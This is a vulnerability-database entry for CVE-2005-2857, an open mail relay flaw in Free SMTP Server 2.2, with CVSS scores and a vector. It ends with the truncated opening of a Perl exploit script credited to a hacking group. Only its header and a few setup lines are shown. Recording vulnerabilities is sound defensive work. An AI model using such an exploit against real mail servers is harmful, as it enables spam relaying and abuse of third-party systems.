7.5
CVSSv2

CVE-2005-2857

Published: 08/09/2005 Updated: 05/09/2008
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Free SMTP Server 2.2 allows remote malicious users to use the server as an open mail relay (spam proxy).

Vulnerable Product Search on Vulmon Subscribe to Product

softstack free smtp server 2.2

Exploits

#!usr/bin/perl # # FREE SMTP Spam Filter Exploit # ------------------------------------ # Infam0us Gr0up - Securiti Research # # Info: infamous2hellcom # Vendor URL: wwwsoftstackcom/ # use IO::Socket; use Socket; print("\n FREE SMTP Spam Filter Exploit\n"); print(" ---------------------------------\n\n"); # Changes to own feed ...